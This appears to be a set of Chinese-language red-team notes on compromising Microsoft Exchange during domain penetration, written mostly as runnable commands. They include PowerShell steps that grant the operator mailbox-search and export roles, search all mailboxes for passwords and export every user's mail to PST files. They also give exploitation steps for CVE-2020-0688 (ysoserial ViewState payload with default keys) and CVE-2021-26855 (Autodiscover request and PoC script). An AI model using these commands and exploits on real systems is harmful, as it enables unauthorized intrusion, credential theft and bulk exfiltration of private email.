域渗透———邮箱服务器
0.寻找exchange
1.通过端口寻找
25:smtp 443:owa页面 587:加密身份验证
2.setpan */* //相当于机器名查找
net group "Exchange Domain Servers" /domain
net group "Exchange Servers" /domain
1.信息收集
获取exchange版本
Get-Mailbox //获得所有邮箱用户
Get-OrganizationalUnit //获得所有OU(组织单位
Get-MessageTrackingLog -EventID -Start "01/04/2021 09:00:00" -Sender "Administrator@leecinsy.com" //查看Administrator从1月4日到现在发的邮件
搜索邮件
New-ManagementRoleAssignment –Role "Mailbox Search" –User Administrator
Remove-ManagementRoleAssignment -Identity "Mailbox Search-Administrator" -Confirm:$false //将administrator加入搜索组/移除搜索组
UsePSSessionToSearchMailfromExchange -User "administrator" -Password "DomainAdmin123!" -MailBox "test1" -ConnectionUri "http://Exchange01.test.com/PowerShell/" -Filter "*pass*" -TargetMailbox "test2" -TargetFolder "out2" //从用户test1中搜索包含单词pass的邮件并保存到用户test2的out2文件夹
UsePSSessionToSearchMailfromExchange -User "administrator" -Password "DomainAdmin123!" -MailBox "All" -ConnectionUri "http://Exchange01.test.com/PowerShell/" -Filter "*pass*" -TargetMailbox "test2" -TargetFolder "outAll" //包含单词pass的邮件并保存到用户test2的outAll文件夹
DirectSearchMailfromExchange -MailBox "test1" -Filter "*pass*" -TargetMailbox "test2" -TargetFolder "out2" -Version 2013
从用户test1中搜索包含单词pass的邮件并保存到用户test2的out2文件夹
DirectSearchMailfromExchange -MailBox "All" -Filter "*pass*" -TargetMailbox "test2" -TargetFolder "outAll" -Version 2013
搜索所有包含单词pass的邮件并保存到用户test2的outAll文件夹
导出邮件
$User = "leecinsy\cpwgp"
$Pass = ConvertTo-SecureString -AsPlainText 123456ab.. -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://LEE-PC.leecinsy.com/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber
还是先利用PSsession连接
New-ManagementRoleAssignment –Role "Mailbox Import Export" –User Administrator
Remove-ManagementRoleAssignment -Identity "Mailbox Import Export-Administrator" -Confirm:$false
将administrator加入导出组/移除导出组
Get-ManagementRoleAssignment –Role "Mailbox Import Export"|fl user //确认一遍
然后我们需要重启一道ps,否则命令New-MailboxexportRequest无法使用
$User = "test1"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\test\"+$User+".pst")
导出test1的所有邮件并且保存到c:\test\tes1.pst
$User = "test1"
New-MailboxexportRequest -mailbox $User -ContentFilter {(body -like "*pass*")} -FilePath ("\\localhost\c$\test\"+$User+".pst") //选出body里有pass的邮件
Get-Mailbox -OrganizationalUnit Users -Resultsize unlimited |%{New-MailboxexportRequest -mailbox $_.name -FilePath ("\\localhost\c$\test\"+($_.name)+".pst")} //导出所有用户的所有邮件
exchange中的cve横向
CVE-2020-0688 Exchange远程代码执行
1.需要4个值,前面2个默认,第3个基本默认,第四个需要手工获取
--validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
--validationalg = SHA1
--generator=B97B4E27(基本默认)
--viewstateuserkey = ASP.NET_SessionId(手工获取,变量,每次登陆都不一致)
2.利用工具
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="3abf0ea" --isdebug --islegacy
3.访问url
然后对生成的字符串进行url编码
/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=
或者使用傻瓜脚本
python3 cve-2020-0688.py -s https://192.168.149.218/owa/ -u leecinsy\axgg -p qaz2022WSX -c calc
提一嘴,py脚本需要readline,python3 -m pip install pyreadline
CVE-2021-26855 SSRF+RCE
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>axgg@leecinsy.com</EMailAddress>
<AcceptableResponseSchema>
</AcceptableResponseSchema>
</Request>
</Autodiscover>
RCE
python3 poc.py -u 192.168.149.218 -user administrator -suffix @leecinsy.com
